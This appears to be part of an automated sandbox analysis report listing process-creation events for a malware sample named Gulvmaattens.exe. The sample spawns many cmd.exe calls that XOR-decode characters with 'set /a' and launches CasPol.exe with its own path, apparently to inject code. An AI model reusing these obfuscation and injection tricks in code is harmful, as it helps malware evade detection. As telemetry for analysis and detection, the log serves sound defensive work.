          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x4B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x0B^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7D^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x00^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x70^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x4B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x70^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
